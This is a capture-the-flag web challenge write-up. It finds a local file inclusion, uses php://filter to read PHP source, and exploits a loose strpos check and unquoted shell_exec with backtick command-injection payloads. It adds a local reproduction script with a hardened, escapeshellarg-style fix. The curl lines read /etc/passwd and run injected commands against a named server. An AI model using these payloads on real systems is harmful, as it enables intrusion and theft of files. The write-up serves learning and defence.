Tags: web
Rating: 5.0
Challenge URL: http://34.72.118.158:6284/
Inspecting the page source shows two more URLs:
* http://34.72.118.158:6284/fun.php
* http://34.72.118.158:6284/fun1.php?file=suge
Try: http://34.72.118.158:6284/fun1.php?file=../../../../../../etc/passwd => the file content comes back, so the file parameter is a local file inclusion (LFI).
Try: curl "http://34.72.118.158:6284/fun1.php?file=php://filter/convert.base64-encode/resource=fun.php" => the php://filter wrapper returns the source of fun.php base64-encoded instead of executing it:
```
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
```
Decoding the base64 we can see two things in the source:
* strpos($name, 'ls') == false => PHP loose comparison. strpos() returns 0 when 'ls' sits at the very start of the string, and in PHP 0 == false is true, so a string that begins with ls is treated as if it contained no ls at all; the correct check is === false.
* shell_exec('echo '.$_GET['string'].' | xargs /var/www/html/dababy.sh'); => the string parameter is concatenated into a shell command line unquoted, so shell metacharacters (backticks, $(...), ;, |) are interpreted and we can run arbitrary commands such as ls.
Try: curl -v -L "http://34.72.118.158:6284/fun.php?string=\`ls%20../\`" => it shows: flag.txt Is a Cool Name Lesss Go! (the shell runs ls ../ before echo, and its output goes through xargs to dababy.sh, which appends the text).
Final: curl -v -L "http://34.72.118.158:6284/fun.php?string=\`cat%20../flag.txt\`" => the flag is returned the same way.
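The injection in fun.php reproduced locally, as an added example (this is not the challenge's own code). The dababy.sh stand-in is an assumption based only on the observed output (it echoes its arguments followed by " Is a Cool Name Lesss Go!"), and the flag file is constructed sample data. vulnerable_sink mirrors the shell_exec() line from the source; hardened_sink shows the same command with the parameter wrapped the way PHP's escapeshellarg() would wrap it.

```shell
#!/bin/sh
# Added example: local reproduction of the command-injection sink in fun.php.
# Assumptions: dababy.sh only echoes "$* Is a Cool Name Lesss Go!", and the
# flag file is constructed sample data. Nothing here is the challenge's code.
set -e

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Stand-in for /var/www/html/dababy.sh (assumed behaviour, see above).
cat > "$WORK/dababy.sh" <<'EOF'
#!/bin/sh
echo "$* Is a Cool Name Lesss Go!"
EOF
chmod +x "$WORK/dababy.sh"
printf 'FLAG{constructed-example}' > "$WORK/flag.txt"   # constructed sample flag

# Vulnerable sink, equivalent to
#   shell_exec('echo '.$_GET['string'].' | xargs /var/www/html/dababy.sh');
# The request parameter is pasted into the command string unquoted, so the
# shell parses it: backticks, $(...), ';' and '|' are all live.
vulnerable_sink() {
    ( cd "$WORK" && sh -c "echo $1 | xargs ./dababy.sh" )
}

# Hardened sink: the same command with the parameter passed the way PHP's
# escapeshellarg() would pass it, i.e. single-quoted with every embedded
# single quote rewritten as '\''. The inner shell now sees one literal word.
hardened_sink() {
    quoted=$(printf '%s' "$1" | sed "s/'/'\\\\''/g")
    ( cd "$WORK" && sh -c "echo '$quoted' | xargs ./dababy.sh" )
}

# Demo: the same payloads the writeup sends in the string parameter.
echo '[*] vulnerable sink, payload `ls`:'
vulnerable_sink '`ls`'
echo '[*] vulnerable sink, payload `cat flag.txt`:'
vulnerable_sink '`cat flag.txt`'
echo '[*] hardened sink, payload `cat flag.txt` (no longer executed):'
hardened_sink '`cat flag.txt`'
```

Run it with sh. To turn a payload into the real request, URL-encode it and put it in the string parameter exactly as the curl lines above do (space becomes %20; the backticks can be sent raw or as %60). In the hardened form the backtick text is still echoed back by the script, but it is never interpreted as a command.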